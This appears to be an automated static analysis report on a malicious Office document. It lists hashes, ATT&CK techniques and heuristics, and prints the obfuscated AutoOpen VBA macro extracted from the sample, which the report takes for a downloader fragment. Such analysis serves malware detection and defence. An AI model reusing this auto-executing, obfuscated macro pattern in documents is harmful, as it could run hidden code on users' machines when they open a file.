Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 674bb608acd523f4…

MALICIOUS

Office (OLE)

111.9 KB First seen: 2019-04-17
MD5: a20e9d35d6693c00e6b8d4a672088a59 SHA-1: ceb61e6809e706fdde07f58a5516aed62ad354ee SHA-256: 674bb608acd523f4fa5b04be0a7246ec76f2be6c243df6bfb62d625a237972d0
102 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document with a high slack space anomaly and contains a VBA macro. The AutoOpen macro is present, indicating an attempt to automatically execute code when the document is opened. The VBA code itself is heavily obfuscated with meaningless variable names and appears to be a downloader or dropper, though the exact payload cannot be determined from the provided script.

Heuristics 4

  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 114,603 bytes but its declared streams total only 32,623 bytes — 81,980 bytes (72%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1184 bytes
SHA-256: 74870827e1d2c8d6abb83f954478921cd2ada459a7fbfa016d1f94187348a00f
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "nHawNUvzilwUu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   If Jwvvjn = Zjsuq Then

Dim JnTsr()
jXdET = tLUON + VGTzvB + YqoBo + oHVZYa
zJwZjs = kmbBKT + YjDJr

End If
   If SMrVpY Or 12 Then

Dim EXmwnT()
LKuTDZ = lPmqUi + XSPjJ + jwEDq + zjPpF

End If
   If wUuHaw >= TiCif Then

Dim dZmSf()
Cwirw = dCImvj + zjjjP
szJFi = aUYiz + jLumqN

End If
   If uDwTSN <= 5 Then

Dim PCLXY()
zcNhv = XNqJPG + GKuwM
qbbOE = rLmBMn + bNWwUR

End If
   If NZJqo <> AhzFiU Then

Dim PjFWPi()
IPFqc = cwWZjT + RCwJZ + QOzzzY + ZhzJT

End If
VJoaIrcvQAd (mfqmc + CHXCLI + jMsfAL + rRawNjKwWV + NajchIn + vDUfNBLRR + CzLKtSz + fRKEGd + OvCHpLr + iEtiMA + UDzRhjXO)
   If fkZkjO Eqv nAqiv Then

Dim cktjLl()
mdlrzm = fvCol + qOwWm + fENfSI + wKwUB
uhuBzi = tqmswC + pGOoWu + GhZzT + soNjaB

End If
   If ElkMd <= ofEjO Then

Dim jzkYwW()
VSqEs = JoJuiw + LPKkhR
XthwXj = WBjImB + njOhsj

End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.